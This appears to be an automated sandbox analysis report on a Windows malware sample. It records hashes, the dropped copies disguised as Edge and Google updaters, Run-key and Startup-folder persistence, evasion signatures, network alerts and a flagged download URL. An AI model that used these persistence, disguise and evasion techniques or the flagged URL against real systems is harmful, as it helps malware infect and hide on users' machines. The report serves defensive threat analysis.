Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1524651
MD5:	f37e0267c53ae8e94fe38e87524b8c45
SHA1:	facaa93a619ab87da8ac448dd1fc71fb72e5380e
SHA256:	3ecf0a5fdc66d37c9e726334a0e57d6dc1e3ab622653d032f8db827185cc7c80
Tags:	exeuser-Bitsight
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Creates multiple autostart registry keys

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Sigma detected: New RUN Key Pointing to Suspicious Folder

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 3560 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)

LKMService.exe (PID: 800 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)

GoogleUpdater.exe (PID: 1032 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker MD5: F37E0267C53AE8E94FE38E87524B8C45)

LKMService.exe (PID: 3172 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)

WerFault.exe (PID: 6824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)

GoogleUpdater.exe (PID: 884 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)

WerFault.exe (PID: 5160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)

LKMService.exe (PID: 6856 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)

WerFault.exe (PID: 6768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)

GoogleUpdater.exe (PID: 6280 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" MD5: F37E0267C53AE8E94FE38E87524B8C45)

WerFault.exe (PID: 7004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 3560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LKMService_047c5762224547e8b0906f5148be419e

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 3560, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LKMService_047c5762224547e8b0906f5148be419e

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 3560, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_55c2eb9fb8194b3183dae4b65fdda1b5.lnk

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T03:26:15.106582+0200	2803305	3	Unknown Traffic	192.168.2.6	49715	172.67.74.152	80	TCP
2024-10-03T03:26:47.122039+0200	2803305	3	Unknown Traffic	192.168.2.6	49715	172.67.74.152	80	TCP
2024-10-03T03:26:48.278282+0200	2803305	3	Unknown Traffic	192.168.2.6	49715	172.67.74.152	80	TCP
2024-10-03T03:27:20.653255+0200	2803305	3	Unknown Traffic	192.168.2.6	52918	104.26.12.205	80	TCP
2024-10-03T03:27:22.080885+0200	2803305	3	Unknown Traffic	192.168.2.6	52918	104.26.12.205	80	TCP
2024-10-03T03:27:54.825124+0200	2803305	3	Unknown Traffic	192.168.2.6	52923	104.26.12.205	80	TCP
2024-10-03T03:27:56.022740+0200	2803305	3	Unknown Traffic	192.168.2.6	52925	104.26.12.205	80	TCP
2024-10-03T03:28:02.137640+0200	2803305	3	Unknown Traffic	192.168.2.6	52926	104.26.12.205	80	TCP
2024-10-03T03:28:03.435784+0200	2803305	3	Unknown Traffic	192.168.2.6	52928	104.26.12.205	80	TCP
2024-10-03T03:28:24.997014+0200	2803305	3	Unknown Traffic	192.168.2.6	52932	104.26.12.205	80	TCP
2024-10-03T03:28:26.590789+0200	2803305	3	Unknown Traffic	192.168.2.6	52934	104.26.12.205	80	TCP
2024-10-03T03:28:29.090755+0200	2803305	3	Unknown Traffic	192.168.2.6	52937	104.26.12.205	80	TCP
2024-10-03T03:28:30.647857+0200	2803305	3	Unknown Traffic	192.168.2.6	52939	104.26.12.205	80	TCP
2024-10-03T03:28:34.834966+0200	2803305	3	Unknown Traffic	192.168.2.6	52942	104.26.12.205	80	TCP
2024-10-03T03:28:37.434515+0200	2803305	3	Unknown Traffic	192.168.2.6	52944	104.26.12.205	80	TCP
2024-10-03T03:28:42.604352+0200	2803305	3	Unknown Traffic	192.168.2.6	52948	104.26.12.205	80	TCP
2024-10-03T03:28:43.997048+0200	2803305	3	Unknown Traffic	192.168.2.6	52950	104.26.12.205	80	TCP
2024-10-03T03:28:48.497039+0200	2803305	3	Unknown Traffic	192.168.2.6	52953	104.26.12.205	80	TCP
2024-10-03T03:28:49.793905+0200	2803305	3	Unknown Traffic	192.168.2.6	52955	104.26.12.205	80	TCP
2024-10-03T03:29:22.098503+0200	2803305	3	Unknown Traffic	192.168.2.6	52958	104.26.12.205	80	TCP
2024-10-03T03:29:23.611617+0200	2803305	3	Unknown Traffic	192.168.2.6	52960	104.26.12.205	80	TCP
2024-10-03T03:29:55.934540+0200	2803305	3	Unknown Traffic	192.168.2.6	52964	104.26.12.205	80	TCP
2024-10-03T03:29:57.044562+0200	2803305	3	Unknown Traffic	192.168.2.6	52966	104.26.12.205	80	TCP
2024-10-03T03:29:58.796662+0200	2803305	3	Unknown Traffic	192.168.2.6	52967	104.26.12.205	80	TCP
2024-10-03T03:30:00.325209+0200	2803305	3	Unknown Traffic	192.168.2.6	52969	104.26.12.205	80	TCP
2024-10-03T03:30:09.503073+0200	2803305	3	Unknown Traffic	192.168.2.6	52972	104.26.12.205	80	TCP
2024-10-03T03:30:11.138172+0200	2803305	3	Unknown Traffic	192.168.2.6	52974	104.26.12.205	80	TCP
2024-10-03T03:30:20.325250+0200	2803305	3	Unknown Traffic	192.168.2.6	52974	104.26.12.205	80	TCP
2024-10-03T03:30:21.326164+0200	2803305	3	Unknown Traffic	192.168.2.6	52974	104.26.12.205	80	TCP
2024-10-03T03:30:53.325187+0200	2803305	3	Unknown Traffic	192.168.2.6	52974	104.26.12.205	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for domain / URL

Source: https://yalubluseks.eu/get_updatX

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Virustotal: Detection: 23%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Virustotal: Detection: 23%	Perma Link

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 18%
Source: file.exe	Virustotal: Detection: 23%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:52933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.6:52954 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb=" source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbTM source: LKMService.exe, 00000004.00000002.2368522313.0000000001193000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbu source: LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdbon n source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\LKSM.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 3{C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.PDB source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb_+f source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbL}) source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdbs' source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\LKSM.pdb source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001118000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m0C:\Windows\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb( source: LKMService.exe, 00000004.00000002.2368522313.0000000001118000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb`V source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdbu source: LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbt source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.PDB0 source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbrL source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.PDBgi~m source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\LKSM.pdbo+v source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb35$ source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdbte source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor$ source: GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: {%%.pdb source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdbSe source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\DEV\C#\WinAppC\WinApp\WinApp\obj\Release\LKSM.pdbN source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr
Source:	Binary string: \??\C:\Windows\System.Core.pdby source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbV source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb%&, source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor4 source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: m0C:\Windows\mscorlib.pdby source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb ~, source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: osymbols\dll\mscorlib.pdbLb source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdb-Vs source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb9 source: GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: LKSM.pdb< source: WER951D.tmp.dmp.17.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKSM.pdbs source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tLKSM.pdbpo source: LKMService.exe, 0000000F.00000002.2519054896.00000000007B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdbps source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\LKSM.pdbpdbKSM.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: LKSM.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: mC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbor source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbe6 source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb@=B source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbo source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb/# source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbti source: WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbe source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001184000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbY= source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbt source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000738000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.0000000000878000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb# source: GoogleUpdater.exe, 00000012.00000002.2593335370.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001147000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2519054896.0000000000768000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008EC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: LKMService.exe, 00000004.00000002.2368522313.0000000001193000.00000004.00000020.00020000.00000000.sdmp, WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: System.pdb4 source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\LKSM.pdb3 source: GoogleUpdater.exe, 00000012.00000002.2593505751.00000000008A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\DEV\C#\WinAppC\WinApp\WinApp\obj\Release\LKSM.pdb source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb**# source: GoogleUpdater.exe, 0000000B.00000002.2429318563.0000000000F79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: LKMService.exe, 00000004.00000002.2367913182.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdater.exe, 0000000B.00000002.2428912604.0000000000D78000.00000004.00000010.00020000.00000000.sdmp, LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: LKMService.exe, 0000000F.00000002.2517969934.00000000001F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER951D.tmp.dmp.17.dr, WER7272.tmp.dmp.13.dr, WER538F.tmp.dmp.7.dr, WERB3EF.tmp.dmp.20.dr

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData	Jump to behavior
